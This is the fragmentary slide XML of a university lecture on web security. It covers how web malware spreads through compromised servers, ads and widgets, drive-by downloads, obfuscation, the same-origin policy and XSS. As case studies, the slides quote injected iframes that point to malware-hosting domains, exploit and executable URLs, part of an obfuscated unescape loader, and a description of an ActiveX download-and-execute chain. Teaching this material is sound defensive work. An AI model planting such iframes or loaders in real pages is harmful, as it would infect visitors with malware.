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696" r:id="rId2"/>
    <p:sldId id="640" r:id="rId3"/>
    <p:sldId id="725" r:id="rId4"/>
    <p:sldId id="726" r:id="rId5"/>
    <p:sldId id="727" r:id="rId6"/>
    <p:sldId id="728" r:id="rId7"/>
    <p:sldId id="729" r:id="rId8"/>
    <p:sldId id="730" r:id="rId9"/>
    <p:sldId id="731" r:id="rId10"/>
    <p:sldId id="732" r:id="rId11"/>
    <p:sldId id="733" r:id="rId12"/>
    <p:sldId id="734" r:id="rId13"/>
    <p:sldId id="735" r:id="rId14"/>
    <p:sldId id="736" r:id="rId15"/>
    <p:sldId id="737" r:id="rId16"/>
    <p:sldId id="738" r:id="rId17"/>
    <p:sldId id="739" r:id="rId18"/>
    <p:sldId id="741" r:id="rId19"/>
    <p:sldId id="641" r:id="rId20"/>
    <p:sldId id="721" r:id="rId21"/>
    <p:sldId id="722" r:id="rId22"/>
    <p:sldId id="723" r:id="rId23"/>
    <p:sldId id="724" r:id="rId24"/>
    <p:sldId id="743" r:id="rId25"/>
    <p:sldId id="744" r:id="rId26"/>
    <p:sldId id="745" r:id="rId27"/>
    <p:sldId id="746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754" r:id="rId36"/>
    <p:sldId id="755" r:id="rId37"/>
    <p:sldId id="756" r:id="rId38"/>
    <p:sldId id="757" r:id="rId39"/>
    <p:sldId id="758" r:id="rId40"/>
    <p:sldId id="759" r:id="rId41"/>
    <p:sldId id="760" r:id="rId42"/>
    <p:sldId id="761" r:id="rId43"/>
    <p:sldId id="762" r:id="rId44"/>
    <p:sldId id="763" r:id="rId45"/>
    <p:sldId id="764" r:id="rId46"/>
    <p:sldId id="765" r:id="rId47"/>
    <p:sldId id="766" r:id="rId48"/>
    <p:sldId id="767" r:id="rId49"/>
    <p:sldId id="768" r:id="rId50"/>
    <p:sldId id="769" r:id="rId51"/>
    <p:sldId id="770" r:id="rId52"/>
    <p:sldId id="771" r:id="rId53"/>
    <p:sldId id="772" r:id="rId54"/>
    <p:sldId id="642" r:id="rId55"/>
    <p:sldId id="661" r:id="rId56"/>
    <p:sldId id="662" r:id="rId57"/>
    <p:sldId id="663" r:id="rId58"/>
    <p:sldId id="664" r:id="rId59"/>
    <p:sldId id="665" r:id="rId60"/>
    <p:sldId id="666" r:id="rId61"/>
    <p:sldId id="667" r:id="rId62"/>
    <p:sldId id="668" r:id="rId63"/>
    <p:sldId id="669" r:id="rId64"/>
    <p:sldId id="670" r:id="rId65"/>
    <p:sldId id="671" r:id="rId66"/>
    <p:sldId id="672" r:id="rId67"/>
    <p:sldId id="673" r:id="rId68"/>
    <p:sldId id="674" r:id="rId69"/>
    <p:sldId id="675" r:id="rId70"/>
    <p:sldId id="676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12" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="144" d="100"/>
          <a:sy n="14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FCCF7-218F-604D-8E0A-1C0B1EF78881}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>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2FF9-156C-0448-9A93-BC5FA52B9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9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0C6FB-C1E0-2D4C-B08A-94CEC554B545}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>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275E-A216-904D-9D69-19F31E9E9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438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B9E9-0D2E-424A-B0B1-597A20F45D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7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F9F011-1C0D-F246-A72C-B26C2F7C1C60}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>55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1983BB-BBFB-8A47-B204-3D99D266AD1A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>56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5CA09A-62FE-364D-9E3A-FFEBAA935557}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>67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cannot load https://gmail.com/. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'null' is therefore not allowed access.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0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6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9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6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6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3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5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7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0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3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A51A8-D50C-834F-AB52-7C17DAA3ED10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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8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wmf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2.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.gif"/><Relationship Id="rId6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4.wmf"/><Relationship Id="rId6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Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId10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wmf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9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Web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Bailey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/>
              <a:t>ECE 422/CS 461 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Spring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1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 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compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web server and change content directly </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>many vulnerabilities in web applications, apache itself, stolen passwords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templating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system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333" y="4336618"/>
            <a:ext cx="897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&lt;!-- Copyright Information --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;div align='center' class='copyright'&gt;Powered by </a:t>
            </a:r>
          </a:p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="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.invisionboard.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Invision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Power Board&lt;/a&gt;(U) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>v1.3.1 Final &amp;copy; 2003 &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nbsp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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>www.invisionpower.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'&gt;IPS, Inc.&lt;/a&gt;&lt;/div&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;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='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wsfgfdgrtyhgfd.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/193/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>new.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe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='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wsfgfdgrtyhgfd.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>adv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>new.php?adv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=193'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;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24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by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>definition means ceding control of content to another party </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>masters have to trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>advertisers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-syndication allows delegation of advertising space </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>trust </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>is not transitive </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRP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90" y="3317703"/>
            <a:ext cx="5475110" cy="35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Widgets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make sites prettier or more useful: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calendaring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or stats counter </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for praying mantis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linked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to free stats counter in 2002 via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript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/>
              <a:t>started to compromise users in 2006 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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37837"/>
            <a:ext cx="8686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http://expl.info/cgi-bin/ie0606.cgi?homepage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demo.php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cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-bin/ie0606.cgi?type=MS03-11&amp;SP1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/ms0311.jar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cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-bin/ie0606.cgi?exploit=MS03-11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dist.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/f94mslrfum67dh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>winus.exe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78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Trends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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>detection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obfuscating the exploit code itself </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>distributing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>binaries across different domains </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>continuously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>re-packing the binaries </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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354395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document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("%3CHEAD%3E%0D%0A%3CSCRIPT%20 LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21--%0D%0A /*%20criptografado%20pelo%20Fal%20-%20Deboa%E7%E3o %20gr%E1tis%20para%20seu%20site%20renda%20extra%0D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ... </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3C/SCRIPT%3E%0D%0A%3C/HEAD%3E%0D%0A%3CBODY%3E%0D%0A %3C/BODY%3E%0D%0A%3C/HTML%3E%0D%0A")); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>//--&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/SCRIPT&gt;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289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Exploiting Software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To install malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> when a user visits a web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>page, an adversary can choose to exploit flaws in either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70C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> or automatically launched </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions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i.e.,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>drive-by-download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Microsoft’s Data Access Components)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The exploit is delivered to a user’s browser via an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> on a compromised web page.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/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to instantiate an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActiveX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 that is not normally safe for scripting.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 makes an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLHTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>request to retrieve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 executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Adodb.stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>the executable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to disk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err="1" smtClean="0"/>
              <a:t>Shell.Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is used to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>launch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> the newly written</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>executable.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426006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Tricking the User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Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A common example are sites that display thumbnails to adult videos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Clicking on a thumbnail causes a page resembling the Windows Media Player plug-in to load. The page asks the user to download and run a special “codec”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This “codec” is really a malware binary. By pretending that its execution grants access to pornographic material, the adversary tricks the user into accomplishing what would otherwise require an exploitable vulnerability.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53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Classifications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1140252"/>
            <a:ext cx="7402688" cy="57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60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Remotely Linked Exploits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xploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>are leveraged across many sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>exploits are linked from over 10,000 URLS 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80" y="2654572"/>
            <a:ext cx="6772676" cy="42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dirty="0"/>
              <a:t>-based malware is a real problem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millions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of potentially infected users </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automatic detection of malicious web pages to secure web search results </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identified four areas of content control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Observed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>botnet-like structures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6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Risk #2: we don’t want a malicious site to be able to spy on or tamper with my information or interactions with other websites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> should not let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> spy on my emails in Gmail or buy stuff with my Amazon account </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A security policy grafted on after-the-fact, and enforced by web browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intuition: each web site is isolated from all others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 #1: we don’t want a malicious site to be able to trash my files/programs on my computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browsing to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>awesomevids.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) should not infect my computer with malware, read or write files on my computer, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is sandboxed;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>try to avoid security bugs in browser code; privilege separation; automatic updates; etc.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92566"/>
            <a:ext cx="7020653" cy="47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273415"/>
            <a:ext cx="6214957" cy="44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Granularity of protection: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Origin = protocol + hostname (+ port)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on one page can read, change, and interact freely with all other pages from the same origin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07" y="2702193"/>
            <a:ext cx="7475699" cy="18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5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Browsers provide isolation for JS scripts via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same Origin Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>SOP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Simple version: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser associates web page elements (layout, cookies, events) with a given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>≈ web server that provided the page/cookies in the first place</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Identity of web server is in terms of its hostname, e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bank.com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SOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>only scripts received from a web page’s origin have access to page’s elements </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS: Subverting the Same Origin Policy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5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Review | HTTP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7825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4957" y="2554069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mail.com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42672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31952" y="2184737"/>
            <a:ext cx="3477299" cy="203132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&lt;html&gt;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&lt;head&gt;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&lt;script&gt;alert(‘Hi!’)&lt;/script&gt;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&lt;/head&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img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52578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575257"/>
            <a:ext cx="2366930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329613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5370071"/>
            <a:ext cx="3467265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267733" y="2413667"/>
            <a:ext cx="2209800" cy="983397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http://gmail.com/ says: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Hi!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90" y="3505199"/>
